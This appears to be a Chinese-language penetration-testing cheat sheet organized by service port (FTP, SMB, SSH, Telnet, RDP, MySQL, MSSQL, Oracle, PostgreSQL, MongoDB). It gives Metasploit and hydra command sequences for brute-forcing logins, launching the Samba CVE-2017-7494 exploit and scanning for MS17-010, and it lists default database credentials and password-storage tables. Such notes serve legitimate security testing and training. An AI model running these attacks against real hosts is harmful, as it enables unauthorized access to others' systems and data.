主机与数据库安全
主机共享端口及漏洞利用/检测
FTP服务
端口: 21
FTP是File Transfer Protocol (文议) 的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是件传输协一个应用程序( Application )。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一-种协议以传输文件。
直接访问ftp://xx.xx.xxxx
FTP暴力破解
ftp的爆破工具有很多,常见的暴力破解工具有hydra、medusa 超级弱口令爆破工具等,推荐使用msf中的ftp模块、超级弱口令爆破工具
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.109.134
set USER_ FILE /home/dic/dic_username_ ftp.txt
set PASS_ FILE /home/dic/dic_ password_ ftp.txt
set THREADS 30
run
Samba概述
默认端口: 137、135、139、 445等
Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成Samba服务:对于这个可以在windows与Linux之间进行共享文件的服务同样是我们攻击的关注点; samba登录分为两种方式,一种是需要用户名口令; 另- -种是不需要用户名口令。在很多时候不光是pc机,还有一-些服务器, 网络设备都开放着此服务,方便进行文件共享,但是同时也给攻击者提供了便利。
默认端口: 445
SMB(Server Message Block) Windows协议族,用于文件和打印共享服务。
Samba暴力破解
msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)
msf auxiliary(smb_ login) > show options (查看选项)
msf auxiliary(smb_ login) > set RHOSTS 10.180.100.10 (目标)
msf auxiliary(ssmb_ login) > set USER_ FILE /root/username.txt (用户名字典,或指定用户)
msf auxiliary(ssmb_ login) > set PASS_ _FILE /root/pass.txt (密码字典文件)
msf auxiliary(ssmb_ login) > exploit (开始)
Samba远程代码执行漏洞(CVE-2017-7494 )
使用Msfploit攻击
exploit/linux/samba/is_ known_ pipename
set RHOST 192.168.109.134
exploit
Samba -ms17 -010检测
使用mestasploit检测
use auxiliary/scanner/smb/smb_ ms17_ 010
set rhosts 10.0.0.1-10.0.0.254
set rport 445
run
主机远程连接端口及漏洞利用/检测
SSH概述
默认端口: 22
SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定; SSH 为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台一-包括HP-UX、Linux、 AlX、 Solaris. Digital UNIX、Irix, 以及其他平台,都可运行SSH.
SSH暴力破解
测试工具: hydra、 metasploit、 超级弱口令检查工具
以metasploit为例
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.254
set USER FILE /root/user.txt
set PASS FILE /root/words.txt
set THREADS 30
run
Telnet概述
默认端口: 23
Telnet协议是TEP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。 它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台.上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。
Telnet暴力破解
检测工具:hydra、超级弱口令检查工具、mestaploit
Mestaploit使用
msf > use auxiliary/scanner/telnet/telnet_ login (使用teInet_ login模块)
msf auxiliary(telnet login) > show options (查看 选项)
msf auxiliary(telnet login) > set RHOSTS 10.180.100.141 ( 目标)
msf auxiliary(telnet login) > set USER_ FILE /root/username.txt (用户名字典,或指定用户)
msf auxiliary(telnet login) > set PASS_ FILE /root/pass.txt (密码字典文件)
msf auxiliary(telnet_ login) > exploit (开始)
RDP概述
默认端口: 3389
远程桌面协议(RDP)是一-个多 通道(multi-channel)的协议,让使用者(所在计算机称为用户端或本地计算机’)连上提供微软终端机服务的计算机(称为服务端或远程计算机")。
RDP暴力破解
工具: hydra: 超级弱口令爆破工具
hydra ip rdp -| administrator -P pass.txt -V
数据库服务端口及漏洞利用/检测
常见数据库连接工具
Navicat、phpMyAdmin、sqlyog、OBeaver
常见数据库密码存放位置
MySql(数据库名)——>mysql.user(密码存放位置)——>root/[空] (默认用户名/密码)
SQL Server(数据库名)——>sys.syslnklgns(密码存放位置)——>sa/ sa默认用户名/密码)
Oracle(数据库名)——>sys.dba_users(密码存放位置)——>internal / oracle | system /manager(默认用户名/密码)
Postgresql(数据库名)——>Postgresql.pg_shadow(密码存放位置)——>postgresql / [空]默认用户名/密码)
数据库的特性差异
MSSQL sa 1433 Windows 高权限
MySQL root 3306 Windows/Linux 低权限
Oracle sys/system 1521 Windows/Linux 高权限
Mysql暴力破解
默认端口: 3306
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,属于Oracle旗下产品。
MySQL是一种关系型数据库管理系统, 关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。
工具: hydra. 超级弱口令爆破工具、mestasploit
hydra ip mysql -| administrator -P pass.txt -V
mestasploit
msf > use auxiliary/scanner/mysql/mysql_login ( 使用mysql_login模块)
msf auxiliary(mysql _ogin) > show options (查看选项)
msf auxiliary(mysql_login) > set RHOSTS 192.168.230.176(目标)
msf auxiliary(mysql_login) > set USERNAME root (指定用户)
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt (密码字典文件)
msf auxiliary(mysql_login) > exploit (开始)
MSSQL(sqIserver)-暴力破解
默认端口: 1433
MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台, 提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是-个数据库管理系统,用于建立、使用和维护数据库
工具: hydra、 超级弱口令爆破工具、metasploit
Metasploit爆破Oracle SID
Oracle爆破前得需要获取到目标的SID才可以进入下一步爆破的步骤
msf6 > use auxiliary/scanner/oracle/sid brute
msf6 auxiliary(scanner/oracle/sid brute) > set rhosts 10.20.24.244
msf6 auxiliary(scanner/oracle/sid brute) > set threads 10
msf6 auxiliary(scanner/oracle/sid brute) > run
拿到Oracle的SID后就可以开始对Oracle进行口令爆破了
msf6 > use auxiliary/scanner/oracle/oracle. login
msf6 auxiliary(scanner/oracle/oracle login) > set rhosts 10.20.24.244
msf6 auxiliary(scanner/oracle/oracle login) > set rports 1521
msf6 auxiliary(scanner/oracle/oracle. login) > set sid helowin
msf6 auxiliary(scanner/oracle/oracle login) > set threads 10
msf6 auxiliary(scanner/oracle/oracle. login) > run
Postgresql-暴力破解
默认端口: 5432
PostgreSQL是一种特性非常齐全的自由软件的对象 关系型数据库管理系统(ORDBMS) , 是以加州大学计算机系开发的POSTGRES, 4.2版本为基础的对象关系型数据库管理系统。
测试工具: hydra. 超级弱口令爆破工具、metasploit
mongodb-未授权访问
默认端口: 27017
MongoDB是-个基于分布式文件存储的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性
能数据存储解决方案。
MongoDB是一个介于关系数据库和非关系数据库之间的产品, 是非关系数据库当中功能最丰富,最像关系数据库的。
MongoDB默认端口27017,当配置成无验证时,存在未授权访问,使用msf中的scanner/mongodb/mongodb_ login模块进行测试,使用navicat连接获取数据库中的内容。
检测
use auxiliary/scanner/mongodb/mongodb_login
set rhosts 192.168.90.0/24
set threads 10
exploit